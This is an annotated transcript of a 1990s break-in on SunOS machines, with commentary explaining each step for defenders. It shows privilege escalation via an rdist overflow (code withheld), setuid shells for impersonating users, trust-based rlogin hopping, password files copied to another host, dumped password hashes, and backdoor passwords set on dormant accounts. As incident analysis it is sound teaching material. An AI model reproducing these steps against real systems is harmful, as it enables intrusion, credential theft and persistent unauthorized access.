What the Hacker Was Doing…Line #1When this hacker broke into the system in December, he used a guest account set up without a password. After he broke in, he assigned his own password to the guest account and to the account called "ingres," so he would have easy login access next time around. Line #2The "who" command checks to see whether anyone else is logged on. Our friend doesn't want anyone on the system to notice him. Line #5This line copies a communications program called "kermit" to the hacker's current working directory. Then he can use kermit to transfer the security tools that he will use to gain access to systems and data. Note that most hackers transfer their own security tools to simplify their work. Some hackers know little to nothing about operating systems; they just employ tools written by people who do. Lines #6 to 25Now the hacker is exploiting a known bug to gain root access to the system. (The hacker writes some code to overflow a buffer in rdist and then sends commands to rdist that get executed.) If the system had been properly patched, this wouldn't be possible! 1 valley% sh 2 $ who 3 ingres ttyp0 Jan 18 23:02 4 root ttyp2 Jan 15 18:38 (canyon) 5 $ cp /home2/jeff/bin/kermit.orig kermit 6 $ kermit 7 C-Kermit 5A(178) ALPHA, 29 Jan 92, SUNOS 4.1 (BSD) 8 Type ? or HELP for help 9 C-Kermit>rece fi 10 Escape back to your local Kermit and give a SEND command... 11 # N3 12 0 Yz* @-#Y1~N! y- 13 %!YfiO 14 #"Y@ 15 ##YA 16 #$YB 17 #%YC 18 #&YD 19 C-Kermit> 20 Stopped 21 valley% sh 22 Stopped (signal) 23 valley% sh 24 overflows buffer here (removed for security) 25 $ /tmp/sh Lines #26 to 27The hacker now has root access. He's in! He sets the mode and permissions and changes the name to something he's not likely to forget. Notice that he removes the /tmp/sh file, since he doesn't want to leave any evidence of his visit. Line #28He misspells a command. Line #29 to 45He issues the ls (list) command with -t (time) specified to obtain a directory listing with the newest files listed first. The files are listed. Lines #46 to 48Just checking again to make sure he doesn't have company. Most hackers continue to check the system for other logins for the duration of their attacks. Line #49Here he's using the grep command to find the string "est". (The -i option tells UNIX that either upper- or lowercase characters are OK.) Presumably, the hacker's looking for logins from the DNS domain of ".West". (If you're not familiar with UNIX, "grep" is a common command that stands for Grab Regular ExPression. Basically, you can use grep to search a system for any occurrences of a specified string within files on that system.) 26 # rm /tmp/sh 27 rm: override protection 755 for /tmp/sh? y 28 # lsll 29 # ls -tal 30 total 1049 31 drwxr-xr-x 4 ingres 512 Jan 18 23:04 . 32 -rwsrwsrwx 1 root 24576 Jan 18 23:04 suck 33 -rw-r--r-- 1 root 61 Jan 18 23:04 c.c 34 -rwxr-xr-x 1 ingres 442368 Jan 18 23:03 kermit 35 -rwxrwxrwx 1 ingres 360448 Jan 16 11:02 testit 36 drwxr-xr-x 30 root 1024 Dec 18 20:27 .. 37 -rw-r--r-- 1 ingres 1148 Jun 9 1992 foo 38 drwxrwsrwx 6 ingres 6144 Aug 23 1991 SERVICE 39 -rwxr-xr-x 1 ingres 106496 Feb 25 1991 sun4_lookup 40 -rwxr-xr-x 1 ingres 98304 Feb 25 1991 sun3_lookup 41 drwxr-xr-x 3 ingres 512 Jan 23 1991 quoter 42 -rw-r--r-- 1 ingres 306 Nov 20 1987 .cshrc 43 -rw-r--r-- 1 ingres 1159 Nov 20 1987 .install 44 -r--r--r-- 1 ingres 20 Nov 20 1987 .version 45 -rw-r--r-- 1 ingres 36 Jan 26 1987 .oemstring 46 # who 47 ingres ttyp0 Jan 18 23:02 48 root ttyp2 Jan 15 18:38 (canyon) 49 # last | grep -i est Lines #50 to 57Now he's looking for someone specific "lorin." Apparently, "lorin" hasn't logged in since the last time the hacker broke in and deleted the log files (on January 16). He tries to grep for "lorin" in /etc/passwd, but mistypes the command. Then, he remembers that the user name he's thinking of is "lorimo" not "lorin." Obviously, this guy's been here before. Lines #58 to 61The intruder re-edits a C program to change his user ID to 21477. The new setting allows him to switch user to "lorimo." Lines #62 to 66More typos. This guy could use a good typing tutor. Lines #67 to 75Here the hacker compiles a new version of his exploit code, sending the results (a.out) to another name he will not forget (he's got a great vocabulary). By executing two of his exploit scripts, he changes his user ID. 50 # last lorin 51 wtmp begins Sat Jan 16 11:37 52 # grep lor /etc/passwwd 53 grep: /etc/passwwd: No such file or directory 54 # grep lor /etc/passwd 55 # ypcat passwd | grep lor 56 lori:N.4Pgz4iUS8kk:5734:50:Lori:/home/lori:/bin/csh 57 lorimo:xxYTF8y3fSqGo:21477:50:Lori:/home/lorimo:/bin/csh 58 # ed c.c 59 /uid/ 60 setuid(0); 61 setuid(21477); 62 # cc .cc 63 cc: Warning: File with unknown suffix (.cc) passed to ld 64 ld: .cc: No such file or directory 65 # cc `c 66 > ^C 67 # cc c.c 68 # mv a.out shit 69 # chmod 6777 shit 70 # ./suck 71 # id 72 uid=0(root) gid=0(wheel) groups=7 73 # ./shit 74 $ id 75 uid=21477(lorimo) gid=0(wheel) groups=7 Lines #76 to 88Now he's looking for new places to go by issuing rlogin commands to other systems on which lorimo might be trusted (.rhosts files and /etc/ hosts.equiv are used to set up trust between systems). If lorimo is trusted on other systems, the hacker will be granted access to those systems without having to enter a password. This is called "door rattling." If he is successful, it will give him access to more information and new places to launch attacks from in the future. Line #89The hacker changes his identity back to the superuser (root). Lines #90 to 92He looks over his shoulder again (hence the "who" command), then double-checks that he's got the user ID information correct. Lines #93 to 94The hacker looks for lorimo in the NIS password map. Line #95The hacker changes to the directory /home. 76 $ rlogin tsunami 77 Password: 78 Login incorrect 79 Login incorrect 80 login: ^D 81 Connection closed. 82 $ rlogjn suntzu 83 rlogjn: not found 84 $ rlogin suntzu 85 Password: 86 Login incorrect 87 login: ^D 88 Connection closed. 89 $ ^D 90 # who 91 ingres ttyp0 Jan 18 23:02 92 root ttyp2 Jan 15 18:38 (canyon) 93 # ypcat passwd | grep lorimo 94 lorimo:xxYTF8y3fSqGo:21477:50:Lori :/home/lorimo:/bin/csh 95 # cd /home Line #96The hacker starts a background job to search for .rhost entries in /home. The logic behind this search is that some people using the .rhost file (for trust) may have multiple .rhost entries around the network. While this job is running, he moves on. Line #97 to 98More hacker typos. Lines #99 to 100Our friend has had enough of being lorimo. He checks the password file for jeff. He decides to impersonate jeff. First, however, he must edit his code. Lines #101 to 113He tries to edit his code, but he is in the wrong directory. He switches to the right directory edits the code, executes the code, and becomes the user jeff. Lines #114 to 119Becoming jeff was a good choice. The hacker logs into a new system (tsunami) without even needing a password. (This is an excellent example of how having one system trust another can be very dangerous.) 96 # find . -name .rhosts -print & 97 # gupr 98 # grep^C 99 # ypcat passwd | grep jeff 100 jeff:wW/q0t03L6xO.:13147:50:Jeff :/home/jeff:/bin/csh 101 # ed c.c 102 ?c.c: No such file or directory 103 # cd 104 # ed c.c 105 /uid/ 106 setuid(21477); 107 setuid(13147); 108 # cc c.c 109 # mv a.out shit 110 # chmod 6777 shit 111 # ./shit 112 $ id 113 uid=13147(jeff) gid=0(wheel) groups=7 114 $ rlogj tsunami 115 rlogj: not found 116 $ rlogin tsunami 117 No directory! Logging in with home=/ 118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT 1992 119 You have new mail. Lines #120 to 126The hacker (who is now the user jeff) sets his shell to sh to foil any csh .history logs. (The hacker is being careful not to leave evidence of his commands behind.) Then he checks to see who else is logged onto the system. Lines #127 to 136The hacker tries to copy the password file and gets permission denied because he does not have permission to copy into that directory. He checks to see who he is logged in as (he must have forgotten). He sees he is logged in as Jeff. Since Jeff does not have permission to copy files to that directory, the hacker changes to the /tmp directory where any user has permission to copy files to. Lines #137 to 141He's stretching his wings a bit here, looking for password maps to copy and explore. (He copies the NIS password file to a file called "aaa".) Hackers often copy password files in order to subject them to password crackers and obtain more passwords. The more passwords a hacker has, the better his odds of raiding other systems. 120 tsunami% ^C 121 tsunami% sh 122 $ who 123 wendy ttyp2 Jan 6 13:55 (arawana) 124 derek ttyp3 Jan 13 17:57 (lajolla) 125 derek ttyp4 Jan 15 13:11 (lajolla) 126 jeff ttyp5 Jan 18 23:09 (valley) 127 $ cat /etc/passwd^C 128 $ ypcaty^C 129 $ ypcat passwd > suna 130 suna: Permission denied 131 $ id 132 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff) 133 $ pwd 134 $ cd 135 $ pwd 136 $ cd /tmp 137 $ ypcat passwd > aaa 138 $ ls -tal aa 139 aa not found 140 $ ls -tal aaa 141 -rw-r--r-- 1 jeff 15382 Jan 18 23:09 aaa Lines #142 to 162Now he starts an ftp session back to the original host (valley) as user ingres. In that session, he copies the password file to the system valley. In the same session, he copies his security tools from valley to tsunami. Lines #163 to 173Once again, he re-creates his small C program (again omitted for security reasons) to exploit a security bug to obtain superuser access (root). He now has full control (root access) of system tsunami. 142 $ ftp valley 143 Connected to valley 144 220 valley FTP server (SunOS 4.1) ready. 145 Name (valley:jeff): ingres 146 331 Password required for ingres. 147 Password: 148 230 User ingres logged in. 149 ftp> send aaa 150 200 PORT command successful. 151 150 ASCII data connection for aaa 152 226 ASCII Transfer complete. 153 local: aaa remote: aaa 154 15578 bytes sent in 0.063 seconds (2.4e+02 Kbytes/s) 155 ftp> get foo 156 200 PORT command successful. 157 150 ASCII data connection for foo 158 226 ASCII Transfer complete. 159 local: foo remote: foo 160 1155 bytes received in 0.11 seconds (9.9 Kbytes/s) 161 ftp> quit 162 221 Goodbye. 163 $ cat foo | /usr/ucb/rdist -Server localhost 164 $ /tmp/sh 165 # rm foo 166 # rm /tmp/sh 167 rm: override protection 755 for /tmp/sh? y 168 # ed c.c 169 # cc c.c 170 # chmod 6777 a.out 171 # ./a.out 172 # id 173 uid=0(root) gid=0(wheel) groups=50(lastaff) Lines #174 to 182The hacker looks to see if there are any password.old entries or other changes to the /etc/passwd file. The hacker also tries to change jeff's NIS password without success. Lines #183 to 197This time, he lists the contents of the /etc/passwd file. 174 # ls -tal /etc/*ass* 175 -rw-r--r-- 1 root 634 Dec 7 12:31 /etc/passwd 176 # cat /etc/}4^U 177 passwd 178 cat: /etc/}4: No such file or directory 179 Changing NIS password for jeff on suntzu. 180 Old password: 181 New password: 182 Password unchanged. 183 # cat /etc/passwd 184 root:R7QCfnYR4gvzU:0:1:Operator:/:/bin/csh 185 nobody:*:65534:65534::/: 186 daemon:*:1:1::/: 187 sys:*:2:2::/:/bin/csh 188 bin:*:3:3::/bin: 189 uucp:*:4:8::/var/spool/uucppublic: 190 news:*:6:6::/var/spool/news:/bin/csh 191 ingres:*:7:7::/usr/ingres:/bin/csh 192 audit:*:9:9::/etc/security/audit:/bin/csh 193 sync::1:1::/:/bin/sync 194 sysdiag:*:0:1:Old System Diag:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag sundiag:*:0:1:System Diag:/usr/diag/sundiag:/usr/diag/sundiag/ sundiag 195 operator:lNtDk7crIdKh2:5:5:Account forbackups:/usr/ backup:/bin/csh 196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh 197 +::0:0::: Lines #198 to 209The hacker changes his user ID from superuser back to jeff. Then, he rechecks his user ID and proceeds to rename his a.out to a name he won't forget (just like before). Again, he runs an ls -t command to list the newest files first. Lines #210 to 212He removes his local copy of the NIS password file ("aaa"). He's already copied the file back to host valley, so he doesn't need it here. Then, he removes his exploit code and is ready to move on. Lines #213 to 227The hacker checks to see which filesystems are mounted. 198 # ^D 199 # id 200 uid=4401(jeff) gid=50(lastaff) euid=0(root) groups=50(lastaff) 201 # mc^C 202 # mv .^C 203 # mv a.out shit 204 # ls -tal 205 total 2415 206 drwxrwsrwx 3 bin 1024 Jan 18 23:12 . 207 -rwsrwsrwx 1 root 24576 Jan 18 23:11 shit 208 -rw-r--r-- 1 root 61 Jan 18 23:11 c.c 209 -rw-r--r-- 1 jeff 15382 Jan 18 23:09 aaa 210 # rm aaa 211 # rm c.c 212 rm: override protection 644 for c.c? y 213 # df 214 Filesystem kbytes used avail capacity Mounted on 215 /dev/sd0a 10483 5081 4354 54% / 216 /dev/sd0g 96943 78335 8914 90% /usr 217 /dev/sd0e 22927 3111 17524 15% /var 218 /dev/sd1h 1255494 1081249 48696 96% /home 219 /dev/sd3h 1255494 1030386 99559 91% /home/se 220 la:/usr/local 2097151 1154033 692365 63% /usr/local 221 suntzu:/var/spool/mail 222 445852 334295 66972 83% /var/spool/mail 223 mfp:/home/sybase 318991 244337 42755 85% /home/sybase 224 app1:/export/sun/sun4/openwin-3.0 225 189858 131073 39799 77% /usr/openwin 226 app1:/export/apps 1255494 771887 358057 68% /export/apps 227 app1:/export/apps 1255494 771887 358057 68% /usr/local Lines #228 to 229More typos or possible line noise. Lines #230 to 258The hacker looks for user home directories, finds wendy's home directory, and becomes user wendy. That's short-lived, because for some reason the hacker decides to look for the user dan. Presumably, the hacker already knows that dan exists. 228 # irG~cd /home/se 229 irG~cd: not found 230 # cd /home/se 231 # ls 232 cmeyer hamant lost+found mikec wendy 233 colleen joseph mark mikep 234 derek kevin matthews neally 235 # cd wendy 236 # cp /tmp/shit . 237 # ls -tal shit 238 -rwxr-xr-x 1 root 24576 Jan 18 23:13 shit 239 # chmod 6777 shit 240 # ls -tal shit 241 -rwsrwsrwx 1 root 24576 Jan 18 23:13 shit 242 # pwd 243 /home/se/wendy 244 # cd /tmp 245 # ls -tal | more 246 total 2398 247 drwxrwsrwx 3 bin 1024 Jan 18 23:13 . 248 -rwsrwsrwx 1 root 24576 Jan 18 23:11 shit 249 -rwxr-xr-x 1 cmeyer 41 Jan 13 12:31 junk 250 -rw-r--r-- 1 cmeyer 12 Jan 13 12:05 junk.dat 251 -rw-r--r-- 1 derek 0 Jan 12 16:07 6310 252 (16 lines of output was deleted and the hacker becomes the user wendy) 253 hacker typos 254 # rm shit 255 # grep dan/etc/passwd 256 # ypcat passwd | grep dan 257 danf:*:13602:50::/home/guest/danf:/bin/csh 258 dan:*H.6HaoIt2xDu2:13601:50:& :/home/guest/dan:/bin/csh Lines #259 to 263More nervous glances (with "who"). Lines #264 to 273He goes back to being jeff. Apparently, the real jeff gets around quite a bit since the hacker now logs onto suntzu as jeff. Again, no password is required. Line #274Another shell change to avoid leaving his mark in the history logs. Lines #275 to 281The hacker checks to make sure that /home/se is mounted from host tsunami. (If you remember, /home/se/wendy is where he left his exploit code. He'll need that to gain root access to this new host.) 259 # who 260 wendy ttyp2 Jan 6 13:55 (arawana) 261 derek ttyp3 Jan 13 17:57 (lajolla) 262 derek ttyp4 Jan 15 13:11 (lajolla) 263 jeff ttyp5 Jan 18 23:09 (valley) 264 # ^D 265 $ id 266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff) 267 $ rlogin suntzu 268 Last login: Thu Jan 14 06:35:30 on ttyh1 269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT 1992 270 You have new mail. 271 suntzu% who 272 jeff ttyp0 Jan 18 23:14 273 (tsunami) 274 suntzu% sh 275 $ df 276 Filesystem kbytes used avail capacity Mounted on 277 /dev/sd6a 14983 11056 2429 82% / 278 /dev/sd6g 91998 76365 6434 92% /usr 279 /dev/sd6h 445852 334297 66970 83% /var 280 /dev/sd4c 1255494 1030410 99535 91% /home/se 281 tsunami:/home/se 1255494 1030410 99535 91% /tmp_mnt/home/se Lines #282 to 287The hacker uses his exploit code and gains root access on the system suntzu. This makes three systems he's compromised so far. Lines #288 to 292He is looking for passwords again. (Is this starting to seem familiar?) Lines #293 to 317The hacker changes to the guest home directory and lists the contents. He notices a file in a home directory called dan/test. Line #318I've removed several lines to protect confidentiality. 282 $ cd /home/se/wendy 283 $ ls -tal shit 284 -rwsrwsrwx 1 root 24576 Jan 18 23:13 shit 285 $ ./shit 286 # id 287 uid=0(root) gid=0(wheel) groups=50(lastaff) 288 # ls -tal /etc/*ass* 289 -rw-r--r-- 1 root 15465 Jan 15 14:29 /etc/passwd 290 -rw-r--r-- 1 root 15462 Dec 28 17:58 /etc/passwd.OLD 291 -rw-r--r-- 1 root 15514 Nov 12 18:58 /etc/passwd.old 292 -rw-r--r-- 1 root 15215 Sep 9 10:02 /etc/passwd~ 293 # cd /home/guests 294 /home/guests: bad directory 295 # cd /home/guest 296 # ls -tal 297 total 56 298 dr-xr-xr-x 10 root 512 Jan 18 23:15 .. 299 drwxr-xr-x 9 guest1 1024 Jan 15 16:21 guest1 300 drwxr-xr-x 11 mary 1536 Jan 14 17:37 mary 301 drwxr-xr-x 5 jeffs 512 Jan 12 15:57 jeffs 302 drwxr-xr-x 3 eddie 512 Jan 8 13:04 eddie 303 drwxr-xr-x 3 sunwise 512 Jan 8 09:36 sunwise 304 drwxrwxrwx 3 brad 512 Jan 6 15:43 dan 305 # ls -tsl dan 306 total 1450 307 1 -rw-r--r-- 1 65534 34 Jan 6 15:43 test 308 264 -rw-r--r-- 1 dan 255563 Jul 8 1992 packet.dat 309 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sz 310 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sx 311 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sb 312 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rx 313 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rb 314 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rz 315 896 -rw-rw-rw- 1 dan 901682 Jun 16 1992 junk.2 316 1 drwxr-xr-x 2 dan 512 Oct 25 1990 doswin 317 # cat dan/test 318 code removed for security reasons Line #319Now the hacker's looking for the person with UID 65534. This turns out to be the user ID for "nobody." Lines #320 to 393Here, he's looking for other users on this system. He's particularly interested in user accounts that haven't been used recently, since no one is likely to notice him using such accounts. To find inactive accounts, the hacker looks for directories with no recent file accesses. He also checks the last times that users were logged into the system. 319 # grep 65534 /etc/passwd 320 # cd /home/se 321 # ls -tal 322 total 44 323 dr-xr-xr-x 10 root 512 Jan 18 23:15 .. 324 drwxr-xr-x 17 wendy 2560 Jan 18 23:13 wendy 325 drwxr-xr-x 26 hamant 4608 Jan 18 17:28 hamant 326 drwxr-xr-x 48 neally 9728 Jan 18 11:03 neally 327 drwxr-xr-x 41 derek 3584 Jan 16 03:16 derek 328 drwxr-xr-x 17 kevin 2048 Jan 15 17:04 kevin 329 drwxr-xr-x 31 mark 3072 Jan 15 16:41 mark 330 drwxr-xr-x 19 colleen 1536 Jan 15 16:15 colleen 331 drwxr-xr-x 44 matthews 4608 Jan 15 11:37 matthews 332 drwxr-xr-x 16 mikep 1536 Jan 15 11:24 mikep 333 drwxr-xr-x 2 10406 512 Dec 2 11:35 mikec 334 drwxr-xr-x 24 cmeyer 2048 Dec 1 11:11 cmeyer 335 drwxr-xr-x 15 root 512 Sep 15 17:04. 336 drwxr-xr-x 8 5542 1536 Aug 28 15:13 joseph 337 drwxr-xr-x 2 root 512 Jul 17 1991 lost+found 338 # last | grep eric 339 ericz ttyh1 Mon Jan 18 08:30 - 08:32 (00:02) 340 ericz ttyh1 Aug 30 14:25 - 14:25 (00:00) 341 ericz ttyh1 ^C 342 # id 343 uid=0(root) gid=0(wheel) groups=50(lastaff) 344 # grep eric /etc/passwd 345 Uace:LEkQ/KdKGcyV2:4:4:ACE:/usr/spool/uucppublic: /usr/ lib/uucp/uucico 346 Uaim:93uUCUdUU6zdI:4:4:AIM:/usr/spool/uucppublic: /usr/ lib/uucp/uucico 347 ericz:vt0R/k7x2W1kY:3063:50::/home/region3/ericz:/bin/csh 348 ericc:23JjW1a5hqUSQ:4094:10:& :/home/guest/eric:/bin/csh 349 # last ericc 350 ericc ttyp1 ptero Mon Aug 3 18:52 - 18:52 (00:00) 351 wtmp begins Wed Jul 1 18:46 352 # last richp 353 richp ttyp0 awe Sat Jan 16 19:33 - 19:34 (00:00) 354 richp ttyp4 vela Mon Jan 11 15:59 - 16:00 (00:00) 355 richp ttyp8 vela Wed Oct 7 13:28 - 13:58 (00:29) 356 richp ttyh1 Mon Oct 5 15:39 - 15:41 (00:01) 357 richp ttyh1 Mon Oct 5 14:15 - 14:18 (00:02) 358 richp ttyh1 Mon Oct 5 13:54 - 13:58 (00:03) 359 richp ttyp3 vela Mon Oct 5 09:43 - 09:44 (00:00) 360 richp ttyh1 Wed Sep 30 17:57 - 17:57 (00:00) 361 richp ttyp2 vela Tue Sep 29 14:31 - 14:32 (00:00) 362 richp ttyh1 Thu Sep 24 13:48 - 13:51 (00:02) 363 richp ttyp1 valley Wed Sep 23 19:47 - 19:48 (00:00) 364 richp ttyh1 Wed Sep 23 13:28 - 13:48 (00:20) 365 richp ttyh1 Mon Sep 21 11:27 - 11:29 (00:02) 366 richp ttyp6 vela Fri Sep 4 09:15 - 09:16 (00:01) 367 richp ttyp5 vela Thu Sep 3 12:31 - 13:00 (00:28) 368 richp ttyp5 vela Thu Sep 3 12:11 - 12:11 (00:00) 369 richp ttyp5 vela Thu Sep 3 11:42 - 11:43 (00:00) 370 richp ttyp5 vela Thu Sep 3 10:01 - 10:04 (00:02) 371 wtmp begins Wed Jul 1 18:46 372 # last lwake 373 lwake ttyp2 runcible Tue Dec 1 15:00 - 15:06 (00:06) 374 lwake ttyp3 runcible Wed Sep 30 13:01 - 13:15 (00:13) 375 lwake ttyp2 runcible Tue Sep 22 09:12 - 09:14 (00:02) 376 lwake ttyp2 runcible Fri Jul 24 14:40 - 14:40 (00:00) 377 lwake ttyp4 runcible Fri Jul 17 09:13 - 09:14 (00:00) 378 lwake ttyp4 runcible Fri Jul 17 09:12 - 09:13 (00:00) 379 lwake ttyp2 runcible Mon Jul 13 16:56 - 17:02 (00:05) 380 wtmp begins Wed Jul 1 18:46 381 # last eggers 382 eggers ttyp0 sunkist Thu Jan 7 06:40 - 06:40 (00:00) 383 eggers ttyh1 Mon Nov 16 16:41 - 16:42 (00:00) 384 eggers ttyp1 bike Mon Nov 16 16:37 - 16:41 (00:03) 385 eggers ttyp1 bike Thu Nov 12 18:35 - 18:39 (00:03) 386 eggers ftp bike Wed Oct 7 12:58 - 13:03 (00:05) 387 eggers ttyp8 bike Wed Oct 7 12:53 - 13:03 (00:10) 388 eggers ttyp1 bike Tue Oct 6 14:14 - 15:27 (01:13) 389 eggers ttyp1 bike Wed Sep 23 16:25 - 16:30 (00:05) 390 eggers ttyp1 bike Tue Sep 15 20:34 - 20:36 (00:01) 391 eggers ttyh1 Fri Sep 11 18:39 - 18:39 (00:00) 392 eggers ttyh1 Fri Sep 11 18:11 - 18:21 (00:10) 393 eggers ttyh1 Fri Sep 11 17:52 - 18:01 (00:08) Lines # 394 to 426At this point, our friend is getting ready to leave. But first, he sets new passwords to the dormant accounts he's been using. This step will make his next break-in here much easier. (This is why you always need to set new passwords after a break-in!) Lines #427 to 431Enough for one day. Our unwanted guest covers his tracks (not shown for security reasons) and logs out. 394 # passwd ericc 395 Changing password for ericc on suntzu. 396 New password: 397 Retype new password: 398 # grep lori /etc/passwd 399 lori:FAJEq1YKw4p7.,0:5734:50:Lori:/home/guest/lori:/bin/csh 400 # pwd 401 /tmp_mnt/home/se/wendy 402 # cd /home/guests 403 /home/guests: bad directory 404 # cd /home/guest 405 # ls -tal lori 406 total 10 407 drwxr-xr-x 52 root 1024 Sep 12 14:25 .. 408 drwxr-xr-x 3 lori 512 Aug 9 18:46 . 409 -rw-r--r-- 1 lori 1262 Aug 9 18:46 .l123set,v1.1 410 drwxr-xr-x 2 lori 512 Aug 8 17:45 .dist 411 -rw-r--r-- 1 lori 1457 Jun 7 1991 .login 412 -rw-r--r-- 1 lori 2687 Jun 7 1991 .cshrc 413 # last lori 414 wtmp begins Wed Jul 1 18:46 415 # passwd ericc 416 Changing password for ericc on suntzu 417 New password: 418 Retype new password: 419 # passwd lori 420 Changing password for lori on suntzu 421 New password: 422 Retype new password: 423 # passwd jeff 424 Changing password for jeff on suntzu 425 New password: 426 Retype new password: 427 # ^ D 428 $ ^D 429 valley% ^D 430 There are stopped jobs 431 valley% logout |